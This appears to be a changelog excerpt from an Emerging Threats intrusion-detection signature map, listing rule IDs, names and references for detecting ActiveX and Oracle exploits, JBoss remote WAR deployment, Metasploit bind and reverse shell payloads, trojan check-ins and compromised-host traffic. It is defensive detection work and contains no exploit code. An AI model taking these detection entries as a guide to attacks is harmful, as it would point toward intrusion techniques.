        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010369 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010370 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010371 || ET SCAN Amap TCP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010371 || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Amap || url,doc.emergingthreats.net/2010372 || url,freeworld.thc.org/thc-amap/
        2010373 || ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010373 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010374 || ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_HaiHaisoft || url,doc.emergingthreats.net/2010374 || url,www.securityfocus.com/bid/37151/info || url,www.shinnai.net/exploits/ZzLsi6TIfSuVPh1kPHmP.txt
        2010375 || ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Oracle || url,doc.emergingthreats.net/2010375 || cve,2009-1991 || url,www.securityfocus.com/bid/36748
        2010376 || ET CURRENT_EVENTS WU Malicious Spam Inbound || url,doc.emergingthreats.net/2010376 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_DHL
        2010377 || ET POLICY JBOSS/JMX 80 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010377 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010378 || ET POLICY JBOSS/JMX 8080 access from outside || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Jboss || url,doc.emergingthreats.net/2010378 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010379 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010379 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010380 || ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_Jboss || url,doc.emergingthreats.net/2010380 || url,www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf || url,www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/
        2010381 || ET TROJAN Bredolab Checkin || url,doc.emergingthreats.net/2010381 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,threatexpert.com/report.aspx?md5=a5f94577d00d0306e4ef64bad30e5d37
        2010382 || ET TROJAN Fake AV GET || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Bredolab || url,doc.emergingthreats.net/2010382 || url,threatexpert.com/report.aspx?md5=8d1b47452307259f1e191e16ed23cd35
        2010383 || ET EXPLOIT METASPLOIT BSD Bind shell || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010383
        2010384 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010384
        2010385 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010385
        2010386 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010386
        2010387 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010387
        2010388 || ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010388
        2010389 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010389
        2010390 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010390
        2010391 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010391
        2010392 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010392
        2010393 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010393
        2010394 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010394
        2010395 || ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010395
        2010396 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010396
        2010397 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010397
        2010398 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010398
        2010399 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010399
        2010400 || ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010400
        2010401 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010401
        2010402 || ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010402
        2010403 || ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010403
        2010404 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010404
        2010405 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010405
        2010406 || ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010406
        2010407 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010407
        2010408 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010408
        2010409 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010409
        2010410 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010410
        2010411 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010411
        2010412 || ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010412
        2010413 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010413
        2010414 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010414
        2010415 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010415
        2010416 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010416
        2010417 || ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010417
        2010418 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010418
        2010419 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010419
        2010420 || ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010420
        2010421 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010421
        2010422 || ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010422
        2010423 || ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010423
        2010424 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010424
        2010425 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010425
        2010426 || ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010426
        2010427 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010427
        2010428 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010428
        2010429 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010429
        2010430 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010430
        2010431 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010431
        2010432 || ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010432
        2010433 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010433
        2010434 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010434
        2010435 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010435
        2010436 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010436
        2010437 || ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/EXPLOIT/EXPLOIT_Metasploit_Encoders || url,doc.emergingthreats.net/2010437
        2010438 || ET MALWARE Possible Malicious Applet Access (justexploit kit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_Justexploit || url,doc.emergingthreats.net/2010438 || url,www.malwaredomainlist.com/forums/index.php?topic=3570.0
        2010439 || ET TROJAN Generic Trojan Checkin (UA VBTagEdit) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Generic.Malware || url,doc.emergingthreats.net/2010439
        2010440 || ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads || url,doc.emergingthreats.net/2010440 || url,malwareurl.com
        2500506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510506 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510507 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (254) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510508 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510509 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (255) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510510 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510511 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (256) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510512 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510513 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (257) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510514 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510515 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (258) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510516 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510517 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (259) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510518 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510519 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (260) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510520 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510521 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (261) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510522 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510523 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (262) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510524 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510525 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (263) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510526 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510527 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (264) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510528 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510529 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (265) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510530 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510531 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (266) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510532 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510533 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (267) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510534 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510535 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (268) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510536 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510537 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (269) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510538 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510539 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (270) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Added to emerging-sid-msg.map.txt (140):
        2010369 || ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010369 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_CLIENT/WEB_Symantec || url,doc.emergingthreats.net/2010370 || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
